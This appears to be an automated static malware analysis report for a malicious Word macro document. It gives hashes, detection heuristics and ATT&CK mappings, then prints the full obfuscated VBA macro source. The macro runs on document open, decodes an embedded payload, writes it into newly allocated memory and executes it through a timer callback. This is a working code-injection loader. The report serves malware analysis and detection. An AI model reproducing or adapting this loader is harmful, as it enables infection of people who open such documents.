Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a26ecd4859456cd3…

MALICIOUS

Office (OLE)

Size: 251.5 KB
Created: 2017-08-13 13:18:00
Authoring application: Microsoft Office Word
First seen: 2017-08-27
MD5: 32e7ab90bc41b0a40d1f27b4074f275f
SHA-1: 09f9f976edb6448b54d4f4b9fcb09c9be5251fc1
SHA-256: a26ecd4859456cd36d7cf3b12e92e318a7922e88ccb1558753c796f2cb08408d
Risk score: 90

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of a macros.bas file. The ClamAV detection 'Doc.Dropper.Agent-6337011-0' strongly suggests a dropper functionality. The VBA code, while obfuscated, appears to be designed to execute arbitrary code, likely downloading a secondary payload. The Document_Open macro firing further supports this, indicating automatic execution upon opening.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6337011-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6337011-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (low, OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
      End Function
      Private Sub Document_Open()
      Dim pericementoclasia As Byte
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13831 bytes
SHA-256: 7561786ec5aa43960e90808ec65d85dbba0e9b9e4bff3d40f55a86f7647d0881

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Function cholecystectomy(health, albert, ruffianly)
nons = george(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (nons) Then
Dim perineal As Variant
Dim necessarian As String
Dim touse As LongPtr
Dim stochastic As LongPtr
Dim monosaccharide As LongPtr
Dim ritualism As String
Dim adventitious As LongPtr
Dim scourings As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (nons) Then
Dim stochastic As Long
Dim rarior As Variant
Dim touse As Long
Dim gambian As Variant
Dim adventitious As Long
Dim auditorium As Integer
Dim monosaccharide As Long
Dim aculeated As Integer
Dim scourings As Long
Dim proconsulship As String
Dim machiavel As Byte
#End If
disposable = "pitterpatter"
disposable = hashish
stochastic = health
scourings = ruffianly
bufo = Rnd(91)
adventitious = albert
instantaneous = 80 + 6
bibliopolist = 36090 + 2
gadgeteer = 281560 + 4
 Pmt 0, instantaneous, 26976, 52812, 2

disposable = disposable
touse = 65 + 28 - 94
hairnet ByVal touse, stochastic, adventitious, scourings, monosaccharide
hashish = disposable
End Function
Sub represented()
Dim pegs As Long
Dim rostov As String
snowclad.inconsonant.Value = Day(#12/5/2013#)
varday = ballproof = amarelle
shouted = undeprived
amplification = "leafy"
celosia = "ambiance"
anthropomancy = "contradicente"

spasmodic = "blackmouthed"
equipage = achivi
Set equilibration = snowclad.inconsonant.SelectedItem
averment = 10 + 8
madrigalist = 18410 + 2
marshal = 174930 + 6
 Pmt 0, averment, 18631, 17652, 2

glottal = equilibration.Name
entomophobia = 7840 + 4
pitiful = Right(glottal, entomophobia)
assemblage = berkshires.dard(pitiful)
reactor = 70 + 2
seminude = 15630 + 1
rafter = 351720 + 4
 Pmt 0, reactor, 36924, 22469, 6

teammate = "gautama"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim racetrack As Byte
Dim awake As LongPtr
Dim actively As LongPtr
Dim cyrillic As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim crucible As String
Dim actively As Long
Dim taxiway As Integer
Dim awake As Long
#End If
saturation = 2 - 2
maintainable = inattentive
belemnitic = 4090 + 6
dissemble = 60 + 4
bricabrac = 25000 + 3
osteomyelitis = 592997
 Pmt 0, dissemble, 14538, 28156, 8

filicopsida = "hake"
lubbard = "amethyst"
destructiveness = gallicism
chaise = 80 + 7
buckeye = 35580 + 4
nefarious = 424730 + 8
 Pmt 0, chaise, 29245, 32382, 8

chateaux = assemblage
bombycid = "evident"
awake = beslime(chateaux)
bodega = anther
letterperfect = "frock"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim townee As Integer
Dim silage As LongPtr
Dim abjectly As LongPtr
Dim androgenic As LongPtr
atoms = 85 + 28 + 1951
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim silage As Long
gastric = 8 - 63 + 836
Dim abjectly As Long
Dim androgenic As Long
atoms = gastric + 3459

#End If
Dim chor As Variant
Dim minotaur As String
silage = 48 - 116 + 68
actively = awake + atoms
abjectly = 201520 + 7
androgenic = 7 * 500
beaumont = tigers(abjectly, silage, actively)
blandiment = 60 + 1
conversazione = 3350 + 2
contractor = 466250 + 7
 Pmt 0, blandiment, 3653, 43423, 4

End Sub

Function beslime(ramify)
Dim biomass As Long
Dim mindblowing As String
Dim godship As Integer
Dim secessionist As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim bangladesh As Variant
Dim nattily As LongPtr
hayfield = 74 - 49 - 17
Dim acaricide As LongPtr
Dim paiute As Long
Dim begrimed As Long
Dim postpone As LongPtr
Dim duckpin As Long
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim nattily As Long
hayfield = 115 + 109 - 220
Dim acaricide As Long
Dim postpone As Long
#End If
branchy = VarPtr(nattily)
flawless = cholecystectomy(branchy, VarPtr(ramify) + 8, hayfield)
amicitias = 1 - 2
acaricide = 62 + 40 - 102
circumrotation = 102 - 92 - 10
postpone = 48 + 127 + 9120
balking = 4090 + 6
rickey = 60 + 4
contented = reinvest(ByVal amicitias, acaricide, ByVal circumrotation, postpone, ByVal balking, ByVal rickey)
hashish = "aerialist"

oilstone = electrocardiogram - 159

cholecystectomy acaricide, nattily, 87 - 109 + 5905
celebes = 70 + 1
aequa = 25140 + 7
mesmerism = 574130 + 7
 Pmt 0, celebes, 17222, 17194, 6

beslime = acaricide
End Function
Private Sub Document_Open()
Dim pericementoclasia As Byte
Dim dryopithecine As Byte
hall = "eumycota"
represented
gasterosteus = 100 + 9
democrat = 17130 + 5
calque = 332370 + 6
 Pmt 0, gasterosteus, 37564, 13740, 7
End Sub



Attribute VB_Name = "berkshires"
'  Hit me like a hurricane
'  We locked eyes over whiskey on ice
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
'  And hit me like a hurricane'  But you rolled in with your hair in the wind
Public Declare PtrSafe Function amoto Lib "Kernel32" Alias "CreateTimerQueueTimer" (gropingly As Any, ByVal arizona As Any, ByVal inchon As Any, ByVal appropinquation As Any, ByVal mythology As Any, ByVal crescendo As Any, ByVal caligation As Any) As Long
'  The moon went hiding, stars quit shining
'  You wrecked my whole world when you came
Public Declare PtrSafe Function museology Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal earthshaking As Any, brumal As Any, collectivism As Any, conspicuously As Any) As LongPtr
'  And hit me like a hurricane'  We locked eyes over whiskey on ice
Public Declare PtrSafe Function reinvest Lib "Ntdll.dll  " Alias _
"NtAllocateVirtualMemory" (tambala As LongPtr, aftertaste As LongPtr, ByVal rockrose As LongPtr, extolByVal As LongPtr, preceptorship As LongPtr, ByVal bastinado As LongPtr) As LongPtr
'  Knew it was gonna be a long night
'  If I woulda just layed my drink down
'  We locked eyes over whiskey on ice
Public Declare PtrSafe Function delineavit Lib "Ntdll.dll  " Alias "AcquireSRWLockShared" (roadstead As Any) As LongPtr
'  The moon went hiding, stars quit shining
'  If I woulda just layed my drink down
Public Declare PtrSafe Function crucially Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal bilabial As Any, footfault As Any, opinions As Any, belittling As Any) As LongPtr
'  We locked eyes over whiskey on ice
'  Baby, without warning
Public Declare PtrSafe Function hairnet Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal conceived As Any, ByVal alliteratively As Any, ByVal gryllidae As Any, ByVal anglophobe As Any, ByVal del As Any) As LongPtr
'  Driving us to your house
'  The moon went hiding, stars quit shining
#End If
'  Driving us to your house
'  Hit me like a hurricane
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
'  I was doing alright
'  The moon went hiding, stars quit shining
Public Declare Function amoto Lib "Kernel32" Alias "CreateTimerQueueTimer" (childs As Any, ByVal griminess As Any, ByVal vainglorious As Any, ByVal nut As Any, ByVal nub As Any, ByVal browser As Any, ByVal antiknock As Any) As Long
'  Started talking bout us again
'  If I woulda just layed my drink down
Public Declare Function hovel Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal decurtate As Any, apian As Any, collectively As Any, gluten As Any) As Long
'  And walked out
'  Hit me like a hurricane
Public Declare Function hock Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal belladonna As Any, bathos As Any, nudity As Any, devilship As Any) As Long
'  Baby, without warning
'  But just your sight had my heart storming
Public Declare Function allegiant Lib "ntdll.dll  " Alias "AcquireSRWLockShared" (mahatma As Any) As Long
'  I wouldnt be in my truck
'  The moon went hiding, stars quit shining
Public Declare Function hairnet Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal caulophyllum As Any, ByVal atherurus As Any, ByVal hydraulicostatics As Any, ByVal infest As Any, ByVal closedchain As Any) As Long
'  The moon went hiding, stars quit shining
'  Rain was driving, thunder, lightning
Public Declare Function reinvest Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (guiltridden As Long, cinematographer As Long, ByVal appulse As Long, pisteByVal As Long, defamer As Long, ByVal amoebean As Long) As Long
'  Rain was driving, thunder, lightning
'  Baby, without warning

'  Then you rolled in with your hair in the wind
'  But you rolled in with your hair in the wind
#End If
'  Then you rolled in with your hair in the wind
'  If I woulda just layed my drink down
Function unstained()
Dim myriapod(255) As Byte
ufa = 126 + 86 - 147
Do While (90 + 1) >= (ufa)
myriapod(ufa) = ufa - 65
ufa = ufa + 1
Loop
ufa = 48
Do While (50 + 8) >= (ufa)
myriapod(ufa) = ufa + 4
ufa = ufa + 1
Loop
ufa = 97
Do While (120 + 3) >= (ufa)
myriapod(ufa) = ufa - 71
ufa = ufa + 1
Loop
myriapod(47) = 63
ufa = 43
myriapod(ufa) = 60 + 2
unstained = myriapod
End Function

Function vicissitudes(characinidae)
vicissitudes = AscW(characinidae)
End Function
Function george(purina)
Dim windser As Integer
Dim tristan As Integer
fixoid = purina * 12
Dim sitroen As Variant
subway2 = purina * 2
Dim cowen() As Byte
#If (3 * 4 + purina) > (7 - 2 * 1) And (10 - purina * 2) * 2 < (Win64) Then
tristan = subway2
#End If
#If (3 * 4 + purina) > (7 - 2 * 1) And Not (10 - purina * 2) * 2 < (Win64) Then
tristan = (120 - fixoid)
#End If
subway3 = subway2 + tristan
george = tristan
End Function
Function gardener(lays, head, conjugally)
Select Case conjugally
Case (40 / 2) + (10 / 2 - 5)
gardener = lays \ head
Case (90 / 3) + (5 - 3) / 2 - 1
gardener = lays And head
Case (30 + 8) + (56 / 7 - 4 * 2)
gardener = lays * head
End Select
End Function
Function dard(drover) As String
fecundate = Math.Round(441)

Dim cockamamie As Long
Dim ejecta As Long
Dim dillydally(63) As Long
Dim archetype() As Byte
Dim maniere As Long
Dim papillary As Byte

disposable = "alternation"

Dim moss As Long

Dim etourderie As Variant

Dim fleshspots(63) As Long
Dim adenanthera(6962) As Byte
Dim behave(63) As Long
disposable = "fonctionnaire"

Dim hedge As String
Dim deescalation As Integer
Dim autoplagiarism As Long
Dim bayonets As Long

braid = 65530 + 6
Dim academical As String

jetting = 16711670 + 10
affluence = 262140 + 4
accrust = 105 + 21 + 130
Dim shepherds As Integer

casern = 60 + 4
fescennine = 18 + 38 + 3976
narwhal = 65270 + 10
Dim shucks As Integer

Colorized = 4090 + 6
barghest = 103 - 89 + 16515058
balderdash = 60 + 3
dichotomous = 115 - 48 + 188
diadophis = 258040 + 8
Dim facias As String
burette = 93 + 43 - 136
babel = 31 + 45 + 7767
Dim sharping() As Byte
Dim inedible As Long
Dim bellbottomed As String
sharping = VBA.StrConv(drover, 128)
Dim tacitum As Byte
fawnColorizeded = 110 + 7
leopards = 4790 + 3
oligomenorrhea = 216110 + 9
 Pmt 0, fawnColorizeded, 2546, 30700, 8

immeasurably = 7840 + 3
asp = vbKeyShift - 12
For hornet = (5 - 5) * 1 To immeasurably
If hornet Mod 2 = (4 - 4) Then
sharping(hornet) = sharping(hornet) - asp
Else
sharping(hornet) = sharping(hornet) - (asp - 1)
End If
Next hornet
dib = 10 + 8
protozoologist = 12420 + 2
dumuzi = 501640 + 2
 Pmt 0, dib, 8000, 49214, 7

deescalation = 3 - 3
conduction = 2 - 2
accusable = 28 + 60 - 45
imitator = unstained
For maniere = (7 - 7) * 1 To (50 + 13) * (5 - 4)
dillydally(maniere) = gardener(maniere, casern, 38)
behave(maniere) = gardener(maniere, Colorized, 38)
fleshspots(maniere) = gardener(maniere, affluence, 38)
Next maniere
eleve = 10 + 1
mouchard = 33750 + 7
camelopard = 531970 + 7
 Pmt 0, eleve, 21463, 24978, 5

archetype = sharping
amoroso = 124 + 46 - 166
janty = 110 + 3
morass = 18710 + 9
bump = 143370 + 10
 Pmt 0, janty, 14891, 36207, 2

numismatist = 72 + 74 - 143
bufo = Fix(209)

bufo = Math.Round(175)

humble = numismatist + 1
dedit = 1 + 1
For autoplagiarism = (4 - 4) * 1 To immeasurably
depositor = archetype(autoplagiarism)
patentee = archetype(autoplagiarism + 2)
tinnitus = behave(imitator(archetype(autoplagiarism + 1)))
laden = dillydally(imitator(patentee)) + imitator(archetype(autoplagiarism + numismatist))
cockamamie = fleshspots(imitator(depositor)) + tinnitus + laden
maniere = gardener(cockamamie, jetting, 30)
adenanthera(ejecta) = gardener(maniere, braid, 20)
maniere = gardener(cockamamie, narwhal, 30)
adenanthera(ejecta + 1) = gardener(maniere, accrust, 20)
adenanthera(ejecta + dedit) = gardener(cockamamie, dichotomous, 30)
ejecta = ejecta + dedit + 1
autoplagiarism = autoplagiarism + 3
Next
dard = adenanthera
End Function

Function tigers(wrd, buls, lky)
#If (7 * 2) * 3 > 14 / 2 And (12 - 6 * 2) * 1 < (Win64) Then
Dim aln As LongPtr
Dim bis As LongPtr
Dim ority As Integer
Dim deble As LongPtr
#End If
#If (12 * 2) / 1 > 14 / 2 And Not (12 - 6 * 2) * 1 < (Win64) Then
Dim aln As Long
Dim bwis As Long
Dim antery As Integer
Dim deble As Long
#End If
aln = buls
deble = lky
dan2 = amoto(wrd, aln, deble, aln, aln, aln, aln)
End Function


Attribute VB_Name = "snowclad"
Attribute VB_Base = "0{49FCFA48-8096-448D-94F1-0CB08577CAC4}{D691BB27-1901-4507-8BB1-08F0FB56B913}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False